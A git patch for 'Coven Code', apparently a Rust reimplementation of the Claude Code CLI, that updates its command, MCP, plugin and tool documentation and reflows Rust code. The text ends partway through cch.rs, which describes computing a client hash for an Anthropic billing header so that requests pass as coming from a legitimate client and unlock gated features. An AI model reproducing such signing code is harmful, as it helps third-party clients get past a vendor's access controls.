From 8bce63e4cde40b341a3334ec867ef370ad69adfc Mon Sep 17 00:00:00 2001 From: Val Alexander <68980965+BunsDev@users.noreply.github.com> Date: Wed, 3 Jun 2026 15:23:17 -0700 Subject: [PATCH] Docs updates and minor Rust formatting fixes Clarify visible slash commands, plugin and MCP behavior in docs: updates to docs/commands.md, docs/mcp.md, docs/plugins.md, and docs/tools.md to list current command usages, MCP subcommands, plugin reload semantics, and tool trait details. Apply numerous minor Rust edits across crates (acp, api, core, plugins, tools, tui, etc.) mostly reflowing long lines, small formatting/unwrap/serde error formatting changes, import reorders, and small cleanups in JSON parsing and logging initialization. These changes improve documentation accuracy for plugin-provided MCP servers (availability at startup vs after reload) and tidy code for readability without functional API changes. --- docs/commands.md | 103 +- docs/mcp.md | 15 +- docs/plugins.md | 20 +- docs/tools.md | 18 +- src-rust/crates/acp/src/connection.rs | 22 +- src-rust/crates/acp/src/lib.rs | 3 +- src-rust/crates/acp/src/permission.rs | 11 +- src-rust/crates/acp/src/prompt.rs | 32 +- src-rust/crates/acp/src/server.rs | 24 +- src-rust/crates/api/src/cch.rs | 122 +- src-rust/crates/api/src/codex_adapter.rs | 466 +- src-rust/crates/api/src/error_handling.rs | 3 +- src-rust/crates/api/src/lib.rs | 103 +- src-rust/crates/api/src/model_registry.rs | 69 +- src-rust/crates/api/src/provider.rs | 9 +- src-rust/crates/api/src/provider_error.rs | 65 +- src-rust/crates/api/src/provider_types.rs | 54 +- .../crates/api/src/providers/anthropic.rs | 750 +- src-rust/crates/api/src/providers/azure.rs | 1042 +- src-rust/crates/api/src/providers/bedrock.rs | 2044 ++-- src-rust/crates/api/src/providers/codex.rs | 8 +- src-rust/crates/api/src/providers/cohere.rs | 1437 +-- src-rust/crates/api/src/providers/copilot.rs | 180 +- src-rust/crates/api/src/providers/free.rs | 43 +- src-rust/crates/api/src/providers/google.rs | 2296 ++-- .../src/providers/message_normalization.rs | 297 +- src-rust/crates/api/src/providers/minimax.rs | 114 +- src-rust/crates/api/src/providers/openai.rs | 2098 ++-- .../crates/api/src/providers/openai_compat.rs | 2563 +++-- .../src/providers/openai_compat_providers.rs | 24 +- .../api/src/providers/request_options.rs | 374 +- src-rust/crates/api/src/registry.rs | 185 +- src-rust/crates/api/src/stream_parser.rs | 17 +- src-rust/crates/api/src/transform.rs | 4 +- .../crates/api/src/transformers/anthropic.rs | 488 +- .../api/src/transformers/openai_chat.rs | 8 +- src-rust/crates/bridge/src/lib.rs | 3430 +++--- src-rust/crates/buddy/src/lib.rs | 2 +- src-rust/crates/cli/src/codex_oauth_flow.rs | 607 +- src-rust/crates/cli/src/main.rs | 1188 +- src-rust/crates/cli/src/oauth_flow.rs | 949 +- src-rust/crates/cli/src/upgrade.rs | 23 +- src-rust/crates/cli/tests/acp_smoke.rs | 18 +- src-rust/crates/commands/src/lib.rs | 2521 +++-- .../crates/commands/src/named_commands.rs | 347 +- src-rust/crates/commands/src/stats.rs | 94 +- src-rust/crates/core/src/accounts.rs | 37 +- src-rust/crates/core/src/attachments.rs | 454 +- src-rust/crates/core/src/auth_store.rs | 7 +- src-rust/crates/core/src/bash_classifier.rs | 1166 +- src-rust/crates/core/src/claudemd.rs | 700 +- src-rust/crates/core/src/cloud_session.rs | 55 +- src-rust/crates/core/src/coven_shared.rs | 14 +- src-rust/crates/core/src/crypto_utils.rs | 2 +- src-rust/crates/core/src/effort.rs | 395 +- src-rust/crates/core/src/feature_flags.rs | 12 +- src-rust/crates/core/src/feature_gates.rs | 517 +- src-rust/crates/core/src/format_utils.rs | 6 +- src-rust/crates/core/src/git_utils.rs | 431 +- src-rust/crates/core/src/goal.rs | 14 +- src-rust/crates/core/src/ide.rs | 4 +- src-rust/crates/core/src/import_config.rs | 113 +- src-rust/crates/core/src/keybindings.rs | 1855 +-- src-rust/crates/core/src/lib.rs | 744 +- src-rust/crates/core/src/lsp.rs | 2931 +++-- src-rust/crates/core/src/mcp_templates.rs | 19 +- src-rust/crates/core/src/memdir.rs | 1774 +-- src-rust/crates/core/src/message_utils.rs | 82 +- src-rust/crates/core/src/migrations.rs | 20 +- src-rust/crates/core/src/oauth_config.rs | 1093 +- src-rust/crates/core/src/output_styles.rs | 813 +- src-rust/crates/core/src/prompt_history.rs | 1763 ++- src-rust/crates/core/src/ps_classifier.rs | 1220 +- src-rust/crates/core/src/remote_session.rs | 15 +- src-rust/crates/core/src/remote_settings.rs | 983 +- src-rust/crates/core/src/session_storage.rs | 1454 ++- src-rust/crates/core/src/session_tracing.rs | 297 +- src-rust/crates/core/src/settings_sync.rs | 1048 +- src-rust/crates/core/src/share_export/mod.rs | 6 +- src-rust/crates/core/src/skill_discovery.rs | 829 +- src-rust/crates/core/src/snapshot/mod.rs | 8 +- src-rust/crates/core/src/snapshot/registry.rs | 4 +- src-rust/crates/core/src/snapshot/shadow.rs | 450 +- src-rust/crates/core/src/snapshot/types.rs | 2 +- src-rust/crates/core/src/spinner.rs | 227 +- src-rust/crates/core/src/status_notices.rs | 18 +- src-rust/crates/core/src/system_prompt.rs | 1322 ++- src-rust/crates/core/src/team_memory_sync.rs | 112 +- src-rust/crates/core/src/tips.rs | 18 +- src-rust/crates/core/src/token_budget.rs | 15 +- src-rust/crates/core/src/truncate.rs | 6 +- src-rust/crates/core/src/update_check.rs | 314 +- src-rust/crates/core/src/voice.rs | 1537 +-- src-rust/crates/core/tests/parity_smoke.rs | 220 +- src-rust/crates/core/tests/snapshot_tests.rs | 75 +- .../crates/core/tests/test_mcp_templates.rs | 162 +- src-rust/crates/mcp/src/backend.rs | 4 +- src-rust/crates/mcp/src/connection_manager.rs | 881 +- src-rust/crates/mcp/src/lib.rs | 3842 +++---- src-rust/crates/mcp/src/oauth.rs | 63 +- src-rust/crates/mcp/src/registry.rs | 548 +- src-rust/crates/mcp/src/rmcp_backend.rs | 90 +- src-rust/crates/plugins/src/hooks.rs | 10 +- src-rust/crates/plugins/src/lib.rs | 1389 +-- src-rust/crates/plugins/src/loader.rs | 681 +- src-rust/crates/plugins/src/manifest.rs | 10 +- src-rust/crates/plugins/src/marketplace.rs | 575 +- src-rust/crates/plugins/src/registry.rs | 682 +- src-rust/crates/query/src/agent_tool.rs | 1315 +-- src-rust/crates/query/src/auto_dream.rs | 29 +- src-rust/crates/query/src/away_summary.rs | 363 +- src-rust/crates/query/src/command_queue.rs | 352 +- src-rust/crates/query/src/compact.rs | 2849 ++--- src-rust/crates/query/src/context_analyzer.rs | 633 +- src-rust/crates/query/src/coordinator.rs | 767 +- src-rust/crates/query/src/cron_scheduler.rs | 245 +- src-rust/crates/query/src/goal_loop.rs | 32 +- src-rust/crates/query/src/lib.rs | 588 +- .../crates/query/src/managed_orchestrator.rs | 8 +- src-rust/crates/query/src/session_memory.rs | 1333 +-- src-rust/crates/query/src/skill_prefetch.rs | 411 +- src-rust/crates/tools/src/apply_patch.rs | 67 +- src-rust/crates/tools/src/ask_user.rs | 9 +- src-rust/crates/tools/src/bash.rs | 1434 +-- src-rust/crates/tools/src/batch_edit.rs | 13 +- src-rust/crates/tools/src/brief.rs | 23 +- src-rust/crates/tools/src/bundled_skills.rs | 1144 +- src-rust/crates/tools/src/computer_use.rs | 1578 +-- src-rust/crates/tools/src/config_tool.rs | 415 +- src-rust/crates/tools/src/cron.rs | 1036 +- src-rust/crates/tools/src/enter_plan_mode.rs | 127 +- src-rust/crates/tools/src/exit_plan_mode.rs | 125 +- src-rust/crates/tools/src/file_edit.rs | 312 +- src-rust/crates/tools/src/file_read.rs | 339 +- src-rust/crates/tools/src/file_write.rs | 264 +- src-rust/crates/tools/src/formatter.rs | 8 +- src-rust/crates/tools/src/glob_tool.rs | 301 +- src-rust/crates/tools/src/goal_complete.rs | 8 +- src-rust/crates/tools/src/grep_tool.rs | 760 +- src-rust/crates/tools/src/lib.rs | 1823 +-- src-rust/crates/tools/src/lsp_tool.rs | 10 +- src-rust/crates/tools/src/mcp_resources.rs | 16 +- src-rust/crates/tools/src/monitor_tool.rs | 18 +- src-rust/crates/tools/src/notebook_edit.rs | 636 +- src-rust/crates/tools/src/powershell.rs | 604 +- src-rust/crates/tools/src/pty_bash.rs | 48 +- src-rust/crates/tools/src/remote_trigger.rs | 250 +- src-rust/crates/tools/src/repl_tool.rs | 15 +- src-rust/crates/tools/src/send_message.rs | 19 +- src-rust/crates/tools/src/skill_tool.rs | 530 +- src-rust/crates/tools/src/sleep.rs | 8 +- src-rust/crates/tools/src/tasks.rs | 1061 +- src-rust/crates/tools/src/team_tool.rs | 1172 +- src-rust/crates/tools/src/todo_write.rs | 901 +- src-rust/crates/tools/src/tool_search.rs | 566 +- src-rust/crates/tools/src/web_fetch.rs | 790 +- src-rust/crates/tools/src/web_search.rs | 476 +- src-rust/crates/tools/src/worktree.rs | 899 +- src-rust/crates/tui/src/agents_view.rs | 2673 ++--- src-rust/crates/tui/src/app.rs | 1656 ++- src-rust/crates/tui/src/ask_user_dialog.rs | 100 +- src-rust/crates/tui/src/bridge_state.rs | 19 +- .../tui/src/bypass_permissions_dialog.rs | 537 +- src-rust/crates/tui/src/context_viz.rs | 505 +- .../crates/tui/src/custom_provider_dialog.rs | 45 +- .../crates/tui/src/desktop_upsell_startup.rs | 650 +- src-rust/crates/tui/src/device_auth_dialog.rs | 643 +- src-rust/crates/tui/src/dialog_select.rs | 4 +- src-rust/crates/tui/src/dialogs.rs | 359 +- src-rust/crates/tui/src/diff_viewer.rs | 2944 ++--- src-rust/crates/tui/src/effort_picker.rs | 17 +- src-rust/crates/tui/src/elicitation_dialog.rs | 155 +- src-rust/crates/tui/src/export_dialog.rs | 520 +- src-rust/crates/tui/src/familiar_card.rs | 122 +- src-rust/crates/tui/src/familiar_image.rs | 5 +- src-rust/crates/tui/src/familiar_theme.rs | 79 +- src-rust/crates/tui/src/feedback_survey.rs | 461 +- src-rust/crates/tui/src/figures.rs | 46 +- src-rust/crates/tui/src/file_injection.rs | 8 +- .../crates/tui/src/file_injection_dialog.rs | 130 +- src-rust/crates/tui/src/free_mode_dialog.rs | 32 +- src-rust/crates/tui/src/hooks_config_menu.rs | 1236 +- src-rust/crates/tui/src/image_paste.rs | 37 +- .../crates/tui/src/import_config_dialog.rs | 56 +- .../crates/tui/src/invalid_config_dialog.rs | 564 +- src-rust/crates/tui/src/key_input_dialog.rs | 366 +- src-rust/crates/tui/src/kitty_image.rs | 854 +- src-rust/crates/tui/src/lib.rs | 2829 ++--- src-rust/crates/tui/src/mcp_view.rs | 1593 +-- .../crates/tui/src/memory_file_selector.rs | 474 +- .../tui/src/memory_update_notification.rs | 556 +- src-rust/crates/tui/src/message_copy.rs | 953 +- src-rust/crates/tui/src/messages/markdown.rs | 28 +- .../tui/src/messages/markdown_enhanced.rs | 133 +- src-rust/crates/tui/src/messages/mod.rs | 5578 +++++----- src-rust/crates/tui/src/model_picker.rs | 234 +- src-rust/crates/tui/src/notifications.rs | 44 +- src-rust/crates/tui/src/onboarding_dialog.rs | 1057 +- src-rust/crates/tui/src/osc8.rs | 13 +- src-rust/crates/tui/src/overage_upsell.rs | 34 +- src-rust/crates/tui/src/overlays.rs | 4374 ++++---- src-rust/crates/tui/src/plugin_views.rs | 924 +- src-rust/crates/tui/src/prompt_input.rs | 9916 +++++++++-------- src-rust/crates/tui/src/render.rs | 642 +- src-rust/crates/tui/src/rustle.rs | 244 +- src-rust/crates/tui/src/session_branching.rs | 725 +- src-rust/crates/tui/src/session_browser.rs | 1253 ++- src-rust/crates/tui/src/settings_screen.rs | 1913 ++-- src-rust/crates/tui/src/stats_dialog.rs | 2001 ++-- src-rust/crates/tui/src/tasks_overlay.rs | 712 +- src-rust/crates/tui/src/theme_colors.rs | 488 +- src-rust/crates/tui/src/theme_screen.rs | 678 +- src-rust/crates/tui/src/transcript_turn.rs | 348 +- src-rust/crates/tui/src/virtual_list.rs | 21 +- src-rust/crates/tui/src/voice_capture.rs | 662 +- src-rust/crates/tui/src/voice_mode_notice.rs | 53 +- src-rust/crates/tui/tests/diff_viewer.rs | 221 +- .../crates/tui/tests/markdown_enhancements.rs | 425 +- src-rust/crates/tui/tests/render_snapshots.rs | 584 +- 219 files changed, 73655 insertions(+), 66036 deletions(-) diff --git a/docs/commands.md b/docs/commands.md index c863c77..4576c7c 100644 --- a/docs/commands.md +++ b/docs/commands.md @@ -1,6 +1,6 @@ # Coven Code Slash Commands Reference -This document is the complete reference for every slash command available in Coven Code, the Rust reimplementation of Claude Code CLI. Commands are invoked by typing `/command-name` at the REPL prompt. +This document is the reference for the visible slash commands available in Coven Code. Commands are invoked by typing `/command-name` at the REPL prompt. --- @@ -27,22 +27,13 @@ This document is the complete reference for every slash command available in Cov ## Command System Overview -Commands are registered in a priority-ordered registry. When you type a command name, Coven Code resolves it through this chain: - -``` -bundledSkills -> builtinPluginSkills -> skillDirCommands -> -workflowCommands -> pluginCommands -> pluginSkills -> COMMANDS() -``` - -### Command Types - -| Type | Behavior | -|------|----------| -| `local` | Runs synchronously; returns text output directly | -| `local-jsx` | Renders an interactive TUI component (model picker, theme selector, etc.) | -| `prompt` | Expands to a prompt sent to the model via the main inference loop | - -Commands support aliases — for example `/h`, `/?`, and `/help` all invoke the same handler. +Commands are resolved in a priority-ordered registry. When you type a command name, Coven Code checks: + +``` +built-in commands -> user command templates -> discovered skills -> plugin commands +``` + +Commands support aliases — for example `/h`, `/?`, and `/help` all invoke the same handler. ### Usage Syntax @@ -50,7 +41,7 @@ Commands support aliases — for example `/h`, `/?`, and `/help` all invoke the /command-name [arguments] ``` -Arguments are passed as a single string after the command name. Most commands that accept arguments are documented with an `argumentHint` shown in the command palette. +Arguments are passed as a single string after the command name. --- @@ -59,7 +50,7 @@ Arguments are passed as a single string after the command name. Most commands th ### /help **Aliases:** `h`, `?` -Display all available commands with their descriptions. Respects `isHidden` flags — internal or rarely-needed commands are suppressed unless you are an Anthropic employee. +Display all available commands with their descriptions. Hidden and setup-only commands are suppressed from the default listing. ``` /help @@ -342,15 +333,21 @@ Open Coven Code privacy settings. Launches a browser to the Anthropic privacy po ### /mcp -Configure and manage Model Context Protocol (MCP) servers. MCP servers expose additional tools and resources to the agent. +Inspect Model Context Protocol (MCP) servers and reconnect configured servers. MCP servers expose additional tools and resources to the agent. ``` -/mcp -/mcp list -/mcp add -/mcp remove -/mcp restart -``` +/mcp +/mcp list +/mcp status +/mcp auth +/mcp connect +/mcp logs +/mcp resources [name] +/mcp prompts [name] +/mcp get-prompt [key=value ...] +``` + +Add or remove MCP servers by editing `~/.coven-code/settings.json`. --- @@ -782,19 +779,22 @@ List and manage skills. Skills are bundled prompt-commands that extend Coven Cod --- -### /plugin -**Aliases:** `plugins`, `marketplace` - -Manage plugins. Plugins are loadable modules that can register new commands, tools, and hooks. Browse the marketplace or install from a local path. - -``` -/plugin -/plugin list -/plugin install -/plugin install -/plugin remove -/plugin reload -``` +### /plugin +**Aliases:** `plugins` + +Manage plugins. Plugins are loadable modules that can register new commands, tools, hooks, agents, skills, and MCP server definitions. + +``` +/plugin +/plugin list +/plugin info +/plugin enable +/plugin disable +/plugin install +/plugin reload +``` + +`/plugin reload` refreshes the active session plugin registry, hook registry, plugin commands, agents, skills, and in-memory MCP server definitions. New plugin MCP servers are included in the initial MCP connection at startup; if a reload adds a new MCP server after startup, start a new session before expecting its tools in the model tool list. --- @@ -1182,22 +1182,15 @@ Over the Remote Control bridge (used by IDE integrations), only `local`-type com `compact`, `clear`, `cost`, `files` -### Internal-Only Commands - -The following commands are only available when the `USER_TYPE` environment variable is set to `ant` (Anthropic internal builds): - -`commit-push-pr`, `ctx_viz`, `good-claude`, `issue`, `init-verifiers`, `mock-limits`, `bridge-kick`, `ultraplan`, `summary`, `teleport`, `ant-trace`, `perf-issue`, `env`, `oauth-refresh`, `debug-tool-call`, `autofix-pr`, `bughunter`, `backfill-sessions`, `break-cache` - -### Availability-Restricted Commands - -Some commands are available only under certain account or platform conditions: +### Availability-Restricted Commands + +Some commands are available only under certain account or platform conditions: | Command | Restriction | |---------|-------------| -| `/fast` | Available when a fast-mode model is configured for the active provider | -| `/privacy-settings` | Opens Anthropic privacy portal (useful for claude.ai accounts) | -| `/sandbox-toggle` | Functional on macOS, Linux, WSL2 only; no-op on native Windows | - -### Feature-Flagged Commands - -Some commands check `isEnabled()` at runtime. For example, voice-related commands check for audio device availability; the desktop command checks for a display server. +| `/fast` | Available when a fast-mode model is configured for the active provider | +| `/install-slack-app` | Hidden; Slack setup is unavailable in this build | +| `/privacy-settings` | Opens the provider privacy portal where supported | +| `/sandbox-toggle` | Functional on macOS, Linux, WSL2 only; no-op on native Windows | +| `/voice` | Requires an audio backend plus `OPENAI_API_KEY` or `WHISPER_ENDPOINT_URL` for transcription | +| `/chrome` | Requires a running Chrome/Chromium instance launched with remote debugging enabled | diff --git a/docs/mcp.md b/docs/mcp.md index 70f41df..b9e0f03 100644 --- a/docs/mcp.md +++ b/docs/mcp.md @@ -14,6 +14,8 @@ MCP defines three primitives a server can offer: Coven Code discovers tools, resources, and prompts from connected MCP servers during the handshake phase and wraps them as native `Tool` instances (via `McpToolWrapper`), making them transparent to the query loop. +Plugin-provided MCP server definitions are merged into the in-memory config before the initial MCP connection. That means plugin MCP tools are available on first startup instead of requiring a reconnect after plugins load. + --- ## Transports @@ -136,9 +138,12 @@ Use `/mcp` inside an interactive session to inspect and manage MCP servers at ru ``` /mcp — show status of all configured servers /mcp status — same as above -/mcp connect — connect to a server by name -/mcp disconnect — disconnect a server -/mcp restart — disconnect then reconnect a server +/mcp auth — show OAuth auth instructions for a server +/mcp connect — retry a disconnected configured server +/mcp logs — show recent error/log information +/mcp resources [name] — list resources from connected servers +/mcp prompts [name] — list prompt templates from connected servers +/mcp get-prompt [key=value ...] — expand a prompt template ``` The status display shows the connection state and discovered tool count for each server: @@ -184,6 +189,8 @@ Use `ListMcpResources` to discover available URIs before calling `ReadMcpResourc In addition to these, every tool that an MCP server exposes is automatically available to the model under its declared name (wrapped transparently by `McpToolWrapper`). +MCP tool wrappers are built from the servers connected during session startup. `/reload-plugins` refreshes plugin MCP definitions in memory, but newly added plugin MCP servers need a new session before their tools are exposed to the model tool list. + --- ## Reconnection with Exponential Backoff @@ -194,7 +201,7 @@ When an MCP server disconnects or fails to connect, Coven Code starts a backgrou - Backoff factor: **2x** after each failed attempt - Maximum delay: **60 seconds** -The loop exits as soon as the server connects successfully. A new loop can be started again if the server disconnects again later. The `/mcp restart ` command cancels any running loop and starts a fresh connection attempt immediately. +The loop exits as soon as the server connects successfully. If a configured server is disconnected, `/mcp connect ` attempts a reconnect. Add or remove servers by editing `~/.coven-code/settings.json` and starting a new session. Server statuses during reconnection: diff --git a/docs/plugins.md b/docs/plugins.md index f7add85..42cd7a6 100644 --- a/docs/plugins.md +++ b/docs/plugins.md @@ -349,7 +349,7 @@ The `/plugin` slash command manages plugins from within an interactive session: /plugin reload — reload all plugins from disk ``` -After enabling or disabling a plugin, run `/plugin reload` or use `/reload-plugins` to apply changes in the current session without restarting. +After enabling or disabling a plugin, run `/plugin reload` or use `/reload-plugins` to refresh the session plugin registry without restarting. ### /reload-plugins @@ -357,23 +357,17 @@ After enabling or disabling a plugin, run `/plugin reload` or use `/reload-plugi /reload-plugins ``` -Rescans `~/.coven-code/plugins/`, re-reads all manifests, and refreshes the active hook registry, commands, agents, skills, and MCP server definitions. Use this after making changes to a plugin directory or after installing a new plugin. +Rescans `~/.coven-code/plugins/`, re-reads all manifests, and refreshes the active plugin registry, hook registry, plugin commands, agents, skills, and in-memory MCP server definitions. Use this after making changes to a plugin directory or after installing a new plugin. ---- - -## Plugin Marketplace Integration +Plugin-provided MCP servers are merged before the initial MCP connection during startup, so their tools are available in the first session tool list. If a reload adds a new MCP server after startup, restart the session to expose that server's tools to the model tool list. -Plugins published to the Coven Code marketplace have a `marketplace_id` field in their manifest (e.g. `"author/plugin-name"`). The marketplace integration allows: +--- -- Browsing available plugins -- Installing plugins by ID -- Updating installed plugins to newer versions +## Marketplace Metadata -``` -/plugin install author/plugin-name — install from the marketplace -``` +Plugin manifests may include a `marketplace_id` field (e.g. `"author/plugin-name"`) for catalog metadata and future marketplace workflows. -Locally installed plugins (via a file path) do not require a `marketplace_id`. +The current `/plugin install` command installs from a local plugin path. It does not install marketplace IDs directly. --- diff --git a/docs/tools.md b/docs/tools.md index 6941db2..597775e 100644 --- a/docs/tools.md +++ b/docs/tools.md @@ -28,20 +28,20 @@ This document is the complete reference for every tool available to the Coven Co ## Tool System Overview -Every tool in Coven Code implements a common `Tool` interface. This interface defines: +Every tool in Coven Code implements the Rust `Tool` trait in `src-rust/crates/tools/src/lib.rs`. This trait defines: -- **Identity** — name, aliases, MCP info -- **Input schema** — a Zod schema validating the input the model must provide -- **Capability flags** — `isReadOnly`, `isDestructive`, `isConcurrencySafe` -- **Permission check** — `checkPermissions()` called before execution -- **Execution** — `call()` performs the actual operation -- **UI rendering** — React/Ink components for TUI display +- **Identity** — the tool name the model uses to call it +- **Description** — instructions shown to the model +- **Input schema** — a JSON Schema object validating the input the model must provide +- **Permission level** — `None`, `ReadOnly`, `Write`, `Execute`, `Dangerous`, or `Forbidden` +- **Execution** — `execute()` performs the operation after permission resolution +- **Tool definition** — `to_definition()` serializes the name, description, and schema for providers -Tools are loaded eagerly at session start. The model receives tool descriptions and schemas and selects tools to call. Each tool call goes through permission resolution before `call()` is invoked. +Built-in tools are constructed once per session by `all_tools()`. Cheap lookup paths use a static built-in tool-name catalog so status/help flows do not instantiate every tool just to list names. MCP tools are added after MCP servers connect and are wrapped as native `Tool` instances. ### Tool Concurrency -Tools marked `isConcurrencySafe` may run in parallel with other tool calls. Most write tools are not concurrency-safe. Read-only tools are generally safe to parallelize. +The query loop may run compatible tool calls in parallel. Write and execute tools still pass through permission checks, while read-only tools are generally safe to parallelize. --- diff --git a/src-rust/crates/acp/src/connection.rs b/src-rust/crates/acp/src/connection.rs index 67d2c5a..b6ceedf 100644 --- a/src-rust/crates/acp/src/connection.rs +++ b/src-rust/crates/acp/src/connection.rs @@ -224,7 +224,8 @@ where if has_id && (has_result || has_error) && !has_method { // Response — route to pending. - let id: acp::RequestId = serde_json::from_value(v["id"].clone()).unwrap_or(acp::RequestId::Null); + let id: acp::RequestId = + serde_json::from_value(v["id"].clone()).unwrap_or(acp::RequestId::Null); if has_result { let value = v["result"].clone(); connection.complete_pending(&id, Ok(value)); @@ -237,17 +238,15 @@ where } } else if has_id && has_method { // Request. - let id: acp::RequestId = serde_json::from_value(v["id"].clone()).unwrap_or(acp::RequestId::Null); + let id: acp::RequestId = + serde_json::from_value(v["id"].clone()).unwrap_or(acp::RequestId::Null); let method = v .get("method") .and_then(Value::as_str) .unwrap_or("") .to_string(); let params = v.get("params").cloned(); - if tx - .send(Inbound::Request { id, method, params }) - .is_err() - { + if tx.send(Inbound::Request { id, method, params }).is_err() { break; } } else if has_method { @@ -349,9 +348,7 @@ mod tests { .await .unwrap(); writer_handle - .write_all( - b"{\"jsonrpc\":\"2.0\",\"id\":99,\"result\":{\"orphan\":true}}\n", - ) + .write_all(b"{\"jsonrpc\":\"2.0\",\"id\":99,\"result\":{\"orphan\":true}}\n") .await .unwrap(); drop(writer_handle); // EOF the reader @@ -383,8 +380,7 @@ mod tests { let (server_to_client_reader, server_to_client) = duplex(8192); let connection = Connection::new(server_to_client); let (tx, _rx) = mpsc::unbounded_channel(); - let reader_handle = - tokio::spawn(run_reader(connection.clone(), server_reader, tx)); + let reader_handle = tokio::spawn(run_reader(connection.clone(), server_reader, tx)); // Background: as a fake client, read the outbound request and write a // matching response. @@ -403,8 +399,7 @@ mod tests { break; } } - let outbound: serde_json::Value = - serde_json::from_slice(buf.trim_ascii_end()).unwrap(); + let outbound: serde_json::Value = serde_json::from_slice(buf.trim_ascii_end()).unwrap(); let id = outbound["id"].clone(); // Send the response back through the client_to_server pipe. let response = serde_json::json!({ @@ -429,4 +424,3 @@ mod tests { let _ = reader_handle.await; } } - diff --git a/src-rust/crates/acp/src/lib.rs b/src-rust/crates/acp/src/lib.rs index 8059a6b..fbaaa22 100644 --- a/src-rust/crates/acp/src/lib.rs +++ b/src-rust/crates/acp/src/lib.rs @@ -97,7 +97,8 @@ fn install_stderr_tracing() { use tracing_subscriber::{fmt, EnvFilter}; let _ = fmt() .with_env_filter( - EnvFilter::try_from_env("COVEN_CODE_ACP_LOG").unwrap_or_else(|_| EnvFilter::new("warn")), + EnvFilter::try_from_env("COVEN_CODE_ACP_LOG") + .unwrap_or_else(|_| EnvFilter::new("warn")), ) .with_writer(std::io::stderr) .try_init(); diff --git a/src-rust/crates/acp/src/permission.rs b/src-rust/crates/acp/src/permission.rs index 965fbaf..d3ebb48 100644 --- a/src-rust/crates/acp/src/permission.rs +++ b/src-rust/crates/acp/src/permission.rs @@ -14,7 +14,7 @@ use std::sync::Arc; use agent_client_protocol_schema as acp; use claurst_core::permissions::{PermissionDecision, PermissionRequest}; use claurst_core::PermissionHandler; -use claurst_tools::{PendingPermissionStore, PendingPermissionRequest}; +use claurst_tools::{PendingPermissionRequest, PendingPermissionStore}; use tracing::{debug, warn}; use crate::connection::Connection; @@ -56,7 +56,10 @@ pub async fn forward_pending( } = pending; let Some(decision_tx) = decision_tx else { - warn!(tool_use_id, "ACP permission: pending request had no decision_tx"); + warn!( + tool_use_id, + "ACP permission: pending request had no decision_tx" + ); return; }; @@ -130,7 +133,9 @@ fn infer_tool_kind(request: &PermissionRequest) -> acp::ToolKind { return acp::ToolKind::Read; } match request.tool_name.as_str() { - "Edit" | "FileEdit" | "Write" | "FileWrite" | "BatchEdit" | "ApplyPatch" => acp::ToolKind::Edit, + "Edit" | "FileEdit" | "Write" | "FileWrite" | "BatchEdit" | "ApplyPatch" => { + acp::ToolKind::Edit + } "Bash" | "Shell" | "Execute" => acp::ToolKind::Execute, "WebFetch" | "WebSearch" => acp::ToolKind::Fetch, "Glob" | "Grep" | "GlobTool" => acp::ToolKind::Search, diff --git a/src-rust/crates/acp/src/prompt.rs b/src-rust/crates/acp/src/prompt.rs index 8c7f0f7..e971bf2 100644 --- a/src-rust/crates/acp/src/prompt.rs +++ b/src-rust/crates/acp/src/prompt.rs @@ -196,12 +196,10 @@ async fn forward_events( kind, }, ); - let mut tool_call = acp::ToolCall::new( - acp::ToolCallId::new(tool_id.as_str()), - title, - ) - .kind(kind) - .status(acp::ToolCallStatus::InProgress); + let mut tool_call = + acp::ToolCall::new(acp::ToolCallId::new(tool_id.as_str()), title) + .kind(kind) + .status(acp::ToolCallStatus::InProgress); if let Some(input) = raw_input { tool_call = tool_call.raw_input(Some(input)); } @@ -226,20 +224,17 @@ async fn forward_events( let content = vec![acp::ToolCallContent::Content(acp::Content::new( acp::ContentBlock::Text(acp::TextContent::new(result.clone())), ))]; - let raw_output = - serde_json::from_str::(&result).ok().or_else(|| { - Some(serde_json::Value::String(result.clone())) - }); + let raw_output = serde_json::from_str::(&result) + .ok() + .or_else(|| Some(serde_json::Value::String(result.clone()))); let mut fields = acp::ToolCallUpdateFields::new() .status(status) .content(content); if let Some(out) = raw_output { fields = fields.raw_output(Some(out)); } - let update = acp::ToolCallUpdate::new( - acp::ToolCallId::new(tool_id.as_str()), - fields, - ); + let update = + acp::ToolCallUpdate::new(acp::ToolCallId::new(tool_id.as_str()), fields); send_session_update( &connection, &session_id, @@ -249,8 +244,13 @@ async fn forward_events( active_tools.remove(&tool_id); } QueryEvent::Error(msg) => { - send_text_chunk(&connection, &session_id, &format!("\n[error: {}]", msg), false) - .await; + send_text_chunk( + &connection, + &session_id, + &format!("\n[error: {}]", msg), + false, + ) + .await; } _ => {} } diff --git a/src-rust/crates/acp/src/server.rs b/src-rust/crates/acp/src/server.rs index b093b07..a54ab8b 100644 --- a/src-rust/crates/acp/src/server.rs +++ b/src-rust/crates/acp/src/server.rs @@ -97,10 +97,9 @@ impl AgentServer { debug!(method, "ACP: dispatch notification"); match method { "session/cancel" => { - let parsed: Result = - params.map(serde_json::from_value).unwrap_or(Err(serde::de::Error::custom( - "missing params", - ))); + let parsed: Result = params + .map(serde_json::from_value) + .unwrap_or(Err(serde::de::Error::custom("missing params"))); match parsed { Ok(notif) => { if let Some(session) = self.sessions.get(¬if.session_id) { @@ -155,8 +154,9 @@ impl AgentServer { req: acp::NewSessionRequest, ) -> Result { if !req.cwd.is_absolute() { - return Err(acp::Error::invalid_params() - .data(Some(serde_json::json!({ "reason": "cwd must be absolute" })))); + return Err(acp::Error::invalid_params().data(Some( + serde_json::json!({ "reason": "cwd must be absolute" }), + ))); } let session_id = acp::SessionId::new(format!("acp-{}", uuid::Uuid::new_v4())); let state = SessionState::new(session_id.clone(), req.cwd.clone()); @@ -187,19 +187,15 @@ impl AgentServer { })))); } }; - crate::prompt::handle( - self.runtime.clone(), - self.connection.clone(), - session, - req, - ) - .await + crate::prompt::handle(self.runtime.clone(), self.connection.clone(), session, req).await } } fn parse_params(params: Option) -> Result { let value = params.ok_or_else(acp::Error::invalid_params)?; serde_json::from_value(value).map_err(|e| { - acp::Error::invalid_params().data(Some(serde_json::json!({ "deserialize_error": e.to_string() }))) + acp::Error::invalid_params().data(Some( + serde_json::json!({ "deserialize_error": e.to_string() }), + )) }) } diff --git a/src-rust/crates/api/src/cch.rs b/src-rust/crates/api/src/cch.rs index a660399..562f661 100644 --- a/src-rust/crates/api/src/cch.rs +++ b/src-rust/crates/api/src/cch.rs @@ -1,61 +1,61 @@ -//! CCH (Client-Computed Hash) request signing. -//! -//! Computes an xxHash64 fingerprint of the serialised request body and embeds -//! it in the x-anthropic-billing-header. -//! The server uses the hash to verify the request originated from a legitimate -//! Coven Code client and to gate features like fast-mode. - -use xxhash_rust::xxh64::xxh64; - -const CCH_SEED: u64 = 